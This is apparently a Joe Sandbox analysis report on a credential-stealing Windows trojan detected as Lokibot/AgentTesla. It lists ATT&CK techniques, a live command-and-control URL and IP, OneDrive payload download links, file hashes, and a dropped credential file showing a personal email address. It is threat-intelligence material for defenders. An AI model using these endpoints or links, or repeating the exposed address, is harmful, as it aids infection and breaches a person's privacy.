    Source: C:\Users\user\Desktop\QVWb1n5OTH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

    Remote Access Functionality:

    barindex
    Yara detected LokibotShow sources
    Source: Yara matchFile source: Process Memory Space: QVWb1n5OTH.exe PID: 7056, type: MEMORYSTR

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationDLL Side-Loading1Process Injection312Masquerading1OS Credential Dumping1Security Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion221LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection312Security Account ManagerVirtualization/Sandbox Evasion221SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSystem Information Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    QVWb1n5OTH.exe60%VirustotalBrowse
    QVWb1n5OTH.exe29%MetadefenderBrowse
    QVWb1n5OTH.exe49%ReversingLabsWin32.Trojan.AgentTesla

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    secure01-redirect.net19%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://ocsp.di0%Avira URL Cloudsafe
    http://secure01-redirect.net/gb13/fre.php:j100%Avira URL Cloudphishing
    http://secure01-redirect.net/gb13/fre.php100%Avira URL Cloudphishing

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    secure01-redirect.net
    		85.209.2.33
    		truetrueunknown
    erubbw.bl.files.1drv.com
    		unknown
    		unknownfalse
      		high
      ervmpg.bl.files.1drv.com
      		unknown
      		unknownfalse
        		high
        onedrive.live.com
        		unknown
        		unknownfalse
          		high
          skydrive.live.com
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://secure01-redirect.net/gb13/fre.phptrue
            • Avira URL Cloud: phishing
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://onedrive.live.com/viruswarning.aspx/fabrika.exe?cid=5a15fda1ae98540b&avres=IQVWb1n5OTH.exe, 00000004.00000003.24076955216.00000000007F8000.00000004.00000001.sdmp, fabrika.exe.4.drfalse
              		high
              http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpfalse
                		high
                https://ervmpg.bl.files.1drv.com/QQVWb1n5OTH.exe, 00000004.00000002.28437183390.00000000007FA000.00000004.00000020.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168670538.000001FB43A4F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28436253679.000001FB43A4F000.00000004.00000001.sdmpfalse
                    		high
                    https://ervmpg.bl.files.1drv.com/y4mYPEwbzED-97xrx9n29fV7fSyD1fgGpzSF-jmJxyxzc1NPIYDEsZm2hHvKAjBl1ubQVWb1n5OTH.exe, 00000004.00000003.24091064669.000000001E7D4000.00000004.00000001.sdmpfalse
                      		high
                      https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21123&authkey=AKpY_r2QVWb1n5OTH.exe, 00000004.00000002.28436126707.000000000076C000.00000004.00000020.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28438505777.0000000002410000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000003.24086130674.000000001E7DA000.00000004.00000001.sdmpfalse
                        		high
                        http://ocsp.dilsass.exe, 00000006.00000002.28439361982.000001FB442B0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://skydrive.live.com/QVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpfalse
                          		high
                          https://ervmpg.bl.files.1drv.com/y4m-APER2p5Nb5FMLd_ybyQzx60L82xlgrG-sbtfretok1410vF9H862p1fC8MWInhoQVWb1n5OTH.exe, 00000004.00000002.28436126707.000000000076C000.00000004.00000020.sdmpfalse
                            		high
                            http://upx.sf.netAmcache.hve.4.drfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000006.00000000.24168670538.000001FB43A4F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28436253679.000001FB43A4F000.00000004.00000001.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/wsdl/ltlsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpfalse
                                  		high
                                  https://erubbw.bl.files.1drv.com/QVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000003.24063918872.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpfalse
                                    		high
                                    https://onedrive.live.com/QVWb1n5OTH.exe, 00000004.00000002.28435771570.0000000000728000.00000004.00000020.sdmpfalse
                                      		high
                                      http://secure01-redirect.net/gb13/fre.php:jQVWb1n5OTH.exe, 00000004.00000002.28445110812.000000001E7C0000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpfalse
                                          		high
                                          https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21122&authkey=AD5G_lyQVWb1n5OTH.exe, 00000004.00000003.24063918872.00000000007AE000.00000004.00000001.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpfalse
                                              		high
                                              https://erubbw.bl.files.1drv.com/KfQVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpfalse
                                                		high
                                                https://erubbw.bl.files.1drv.com/y4mYud6ym_NJqaq22uaIor9GRHQ64LzKJki5GZymu2f7YS1D2FLOko-vkkGMGoXIJDVQVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpfalse
                                                  		high
                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000006.00000000.24168670538.000001FB43A4F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000002.28436253679.000001FB43A4F000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000006.00000002.28436059319.000001FB43A2F000.00000004.00000001.sdmp, lsass.exe, 00000006.00000000.24168525086.000001FB43A2F000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://onedrive.live.com/?QVWb1n5OTH.exe, 00000004.00000002.28435771570.0000000000728000.00000004.00000020.sdmpfalse
                                                        		high
                                                        https://skydrive.live.com/redir.aspx?resid=5A15FDA1AE98540B%21122&avres=Infected&averror=SUCCESS&vinQVWb1n5OTH.exe, 00000004.00000003.24068854398.00000000007AE000.00000004.00000001.sdmp, QVWb1n5OTH.exe, 00000004.00000002.28436672938.00000000007AD000.00000004.00000020.sdmpfalse
                                                          		high
                                                          https://ervmpg.bl.files.1drv.com/QVWb1n5OTH.exe, 00000004.00000002.28437183390.00000000007FA000.00000004.00000020.sdmpfalse
                                                            		high

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            85.209.2.33
                                                            		secure01-redirect.netRussian Federation
                                                            		208992AXATEL-ASRUtrue

                                                            General Information

                                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                                            Analysis ID:532182
                                                            Start date:01.12.2021
                                                            Start time:20:16:32
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 12m 38s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:QVWb1n5OTH.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                            Run name:Suspected Instruction Hammering
                                                            Number of analysed new started processes analysed:7
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.rans.troj.spyw.evad.winEXE@4/7@5/1
                                                            EGA Information:Failed
                                                            HDC Information:Failed
                                                            HCA Information:Failed
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe
                                                            • HTTP Packets have been reduced
                                                            • TCP Packets have been reduced to 100
                                                            • Excluded IPs from analysis (whitelisted): 51.105.236.244, 20.82.19.171, 13.107.42.13, 13.107.43.12, 52.179.121.14, 13.107.42.12
                                                            • Excluded domains from analysis (whitelisted): eastus0-odwebpl.cloudapp.net, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, tile-service.weather.microsoft.com, l-0003.dc-msedge.net, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, l-0004.l-msedge.net, wdcpalt.microsoft.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, odc-bl-files-brs.onedrive.akadns.net, odwebpl.trafficmanager.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, odc-bl-files-geo.onedrive.akadns.net, nexusrules.officeapps.live.com
                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            20:19:46API Interceptor306x Sleep call for process: QVWb1n5OTH.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            85.209.2.335KLQvMUTLy.exeGet hashmaliciousBrowse
                                                            • secure01-redirect.net/fx/fre.php
                                                            payment copy.exeGet hashmaliciousBrowse
                                                            • secure01-redirect.net/bo/fre.php
                                                            Remittance Advice.exeGet hashmaliciousBrowse
                                                            • secure01-redirect.net/gb18/fre.php
                                                            vbc.exeGet hashmaliciousBrowse
                                                            • secure01-redirect.net/gb7/fre.php
                                                            MV. SKY SUNSHINE.xlsxGet hashmaliciousBrowse
                                                            • secure01-redirect.net/gb7/fre.php
                                                            Shipping Documents000743_pdf.exeGet hashmaliciousBrowse
                                                            • secure01-redirect.net/gb20/fre.php

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            secure01-redirect.net5KLQvMUTLy.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            payment copy.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            Remittance Advice.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            vbc.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            MV. SKY SUNSHINE.xlsxGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            Shipping Documents000743_pdf.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            AWB 3503781595_______________________________________________pdff.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            csrss.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            vbc.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            TLFB795942-02.docxGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            invc_00909776554454545454.wbkGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            UPDATED INVOICE 47054679.xlsxGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            PO#1135 - __.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            52003705.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            2Z1r9x8S1L.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            (BBVA)_transferencias.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            documentos_DHL.pdf.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            DHL tracking number.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            PI 2021084576.xlsxGet hashmaliciousBrowse
                                                            • 212.193.51.49
                                                            Ref 0180066743.PDF_________________________________.exeGet hashmaliciousBrowse
                                                            • 212.193.51.49

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            AXATEL-ASRU5KLQvMUTLy.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            payment copy.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            Remittance Advice.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            vbc.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            MV. SKY SUNSHINE.xlsxGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            Shipping Documents000743_pdf.exeGet hashmaliciousBrowse
                                                            • 85.209.2.33
                                                            nh3NSwpqZHGet hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            aEWUHGHGTmGet hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            J7OXgvNcYxGet hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            iCJoZJ1iF0Get hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            C54EK9KtVcGet hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            FTLsNTw61fGet hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            Px6ysJ74p4Get hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            Xg6fy31O38Get hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            mlQG04CrscGet hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            evVp3INWsXGet hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            OnE5da4MdIGet hashmaliciousBrowse
                                                            • 85.209.2.163
                                                            jywr8stWPfGet hashmaliciousBrowse
                                                            • 85.209.2.163

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612_dec
                                                            Process:C:\Windows\System32\lsass.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):3656
                                                            Entropy (8bit):7.054135847631255
                                                            Encrypted:false
                                                            SSDEEP:96:8O8abjISMN6PHX1HAaXWOOh6hq0r9oyucJ8I7nmutxxB2Yl:H8njcP1PGmRRVl
                                                            MD5:18C5B2828B7E7521ECC08AD69F92DF64
                                                            SHA1:23BFB46ECC77BE2B4F9F88E7DE93482F633B1D57
                                                            SHA-256:7A144B31721C30DADFB584E83816BE3081C09E517DE99178EE4EE9E46F3F90A7
                                                            SHA-512:3F6E83EB4F963CD14DDE3A6FD45B857BC4F01DED6068E41245DA250E4B77855ED2FE440B8EDFECE8E618D0526F39BDD6A011B72A6731F0E4603905F8A5138C16
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: 0...H................j".............................L.e.g.a.c.y.G.e.n.e.r.i.c.:.t.a.r.g.e.t.=.M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m.......(...P.e.r.s.i.s.t.e.d.C.r.e.d.e.n.t.i.a.l.......6...s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m...........D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.0...................z..O........{...I....g.............f...... ...|..p.2+.Tp. b..e...z...\..z.]'............. .......k.K.p^...G.......j.s..C.j. .....i....y.|)....f.W....m[.L....0.>.vg.r6..W4..S...$.. .!Z.. ..).. ....k..`E...47@]..3..*........g.....I~,).....D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.1.........v......|.'.'..1Y....v.w....m...y..`.....<x....6!.~..g. ~7.!.8..6`..Q..../...E.T.>..Z ...`.....bCE.n..\..`....1-..#.6S..s.....S.'.q]..#KR.4...@.e..6/..0....N...._.J.:.Y.d'v..|-u..Y..&..a#..(....[}.!=.s#.V3../..b6..?|.A.&O..?.v_o.....5..?...f....D...M.i.c.r.o.s.o.
                                                            C:\Users\user\AppData\Local\Temp\fabrika.exe
                                                            Process:C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
                                                            Category:dropped
                                                            Size (bytes):7016
                                                            Entropy (8bit):5.5920411538351225
                                                            Encrypted:false
                                                            SSDEEP:96:LyLukn+pM6l5rZcjoINElz1liGPt/bmPYEXTy0FlO1++umUKLm:Dx/1ZcjoIoyGPtjmQEXWWmUKLm
                                                            MD5:27BE5B1D0307CF8A1F142D7629DC1EB2
                                                            SHA1:9DF6B5D6691250AD4736DA03AA84EB4046B43B5A
                                                            SHA-256:3C6B6FD0F9E3C376A450866FD0552046D48249A2D5B195FC6EB324BB4C6D529B
                                                            SHA-512:FDD5EEB83BA5081343490ED3E49D2EB8482DD3DE24BCC1439D3848CD24F969D7B5FA5B4417C6D7DCAD05B96980ACF6C2373038B5C672EB5316B3A35EECDC6CDA
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: ..<html>.. <head>.. <title>Microsoft OneDrive - Access files anywhere. Create docs with free Office Online.</title><meta name="title" content="Microsoft OneDrive - Access files anywhere. Create docs with free Office Online."/><meta name="description" content="Store photos and docs online. Access them from any PC, Mac or phone. Create and work together on Word, Excel or PowerPoint documents."/><meta property="og:title" content="fabrika.exe"/><meta property="og:image" content="https&#58;//p.sfx.ms/icons/v2/Large/Exe.png"/><meta property="og:image:width" content="96"/><meta property="og:image:height" content="96"/><meta property="og:url" content="https&#58;//skydrive.live.com/redir.aspx&#63;resid&#61;5A15FDA1AE98540B&#37;21122&#38;avres&#61;Infected&#38;averror&#61;SUCCESS&#38;vinfo&#61;Trojan&#37;3aWin32&#37;2fAgentTesla.BB&#37;21MTB&#38;authkey&#61;&#37;21AD5G_ly0iOflnT4&#38;page&#61;viruswarning"/><meta property="og:description" content="Application"/><meta property="twitter:
                                                            C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.hdb
                                                            Process:C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            File Type:ISO-8859 text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):4
                                                            Entropy (8bit):2.0
                                                            Encrypted:false
                                                            SSDEEP:3:Yi:Yi
                                                            MD5:5871613A487D2D21971F2A8C8316F2F0
                                                            SHA1:9BE437B878223D142E49816D5699951737E2DC60
                                                            SHA-256:CC22FB77C2B77F521B602FBED057F5B4C8ADEA39C6A172BFD0C832B3F8CE182A
                                                            SHA-512:4BAD3AAD51C668100EABBADFF6F92BD8E3FD0F3BC42C1E70F3B83B16720C1BD59D8F1EA0E0F5F2C79F7049FE936FCE3BA28FFFACA68B6AB949528FA64CAC73C1
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: .6o.
                                                            C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck
                                                            Process:C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview: 1
                                                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb
                                                            Process:C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):47
                                                            Entropy (8bit):1.1262763721961973
                                                            Encrypted:false
                                                            SSDEEP:3:/lSllIEXln:AWE1
                                                            MD5:D69FB7CE74DAC48982B69816C3772E4E
                                                            SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                                                            SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
                                                            SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview: ........................................user.
                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                            Process:C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):2359296
                                                            Entropy (8bit):4.22887042911309
                                                            Encrypted:false
                                                            SSDEEP:24576:de6gTYHyxIsqnO959Xl+ZYT5agmcnYJp:de6gTYHyxIsqnO9rQZy5agmcnYJp
                                                            MD5:5FE1CF13F4828200A806ED310D16AD41
                                                            SHA1:FB83071C7F9B12C768E9A4B1C1C898BD53F689A8
                                                            SHA-256:2459C23CF37D52B774601222165AD3F570FCF743BA2640DC91DE00D4EE7E3126
                                                            SHA-512:0DB6FE771678BDC67F483669C3A839CAC2F990F08E92B7D80A8C342C2F2EA9BDAD1A97F2360038BD820ADE057F39B2949A60F155748AE2989FD051F92C9CB4B0
                                                            Malicious:false
                                                            Preview: regf........5.#.^................... ....P .....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm.....................................................................................................................................................................................................................................................................................................................................................@<J........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                            Process:C:\Users\user\Desktop\QVWb1n5OTH.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):53248
                                                            Entropy (8bit):4.431707811331007
                                                            Encrypted:false
                                                            SSDEEP:768:6oZyP+nlUUhA4JqRrLydQyWqWa8ykMfb59rp1DgeNMRbo6iQQRbCAyG2lKjvDrpl:/Uc5McQVuD0zMiI7rz
                                                            MD5:EF86E770EE3901EE6E5326DD2F9B3131
                                                            SHA1:98C9CE19683D2CEB01BF8C7C3DBC2262AFE3CD70
                                                            SHA-256:C8DCA9D876E42AB1721FE357712F386EA5D7179F1AB4AD0F4283859FA803CD13
                                                            SHA-512:8D4DFFFA517909352258B6B99A4E48B7AEE2E0FBEE18A77BEF169C4F6905C8498CDE942DC4114FB15BCAC91FD896101C974D125C5173678CDB82A60F2F809557
                                                            Malicious:false
                                                            Preview: regf........5.#.^................... ....P .....\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e......Q......P..#....Q......P..#........Q......P..#.rmtm.....................................................................................................................................................................................................................................................................................................................................................@<JHvLE.............P .........%..U.5..;..................hbin................5.#.^...........nk,....S....... .......................................................&...{11517B7C-E79D-4e20-961B-75A811715ADD}......nk ..x.5........(...........@...............................*...N.......)...InventoryMiscellaneousMemorySlotArrayInfo....................mG.....nk .$4./T....... ...................................Z.......................Root........lh..(.....A.....nk .0. 5........(...........

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.226986072662153
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.15%
                                                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:QVWb1n5OTH.exe
                                                            File size:152872
                                                            MD5:f8236209c7b1928b3f1eb0a7074f6992
                                                            SHA1:7f31471385b39722a1c7a6e983ecca372e673796
                                                            SHA256:eab40778e702a859cc33abcd92e796755e95e8fdb0eeb7c5243b7c1866751bb0
                                                            SHA512:b0619a562d6ed00016ef3c3e3fcbbe917718c770d51db0fae31f9bd47f05e41bc312197a906b32988a7ad8c50deda42c29b150954d3b195d024f2510c7cd2440
                                                            SSDEEP:1536:Lf2yGzzFNaIEP6BWYRVpcjK+zDU1BljlR76UMLVNNdsBkz3hay:yyGzz/aIu6BJRVvBkUMLp62Iy
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM..SM..SM...Q..RM...o..UM..ek..RM..RichSM..................PE..L....(!W.....................0......x.............@........

                                                            File Icon

                                                            Icon Hash:20047c7c70f0e004

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x401578
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                            DLL Characteristics:
                                                            Time Stamp:0x572128D8 [Wed Apr 27 21:02:16 2016 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:e6bbebdc7c1418bc1bcdb0dc8a54e696

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:E=Squar5@SPRINDG.Suf, CN=RDDEL, OU=OCTAG, O=PROCOELI, L=GENGAN, S=Ogti8, C=PL
                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                            Error Number:-2146762487
                                                            Not Before, Not After
                                                            • 24/11/2021 02:10:46 24/11/2022 02:10:46
                                                            Subject Chain
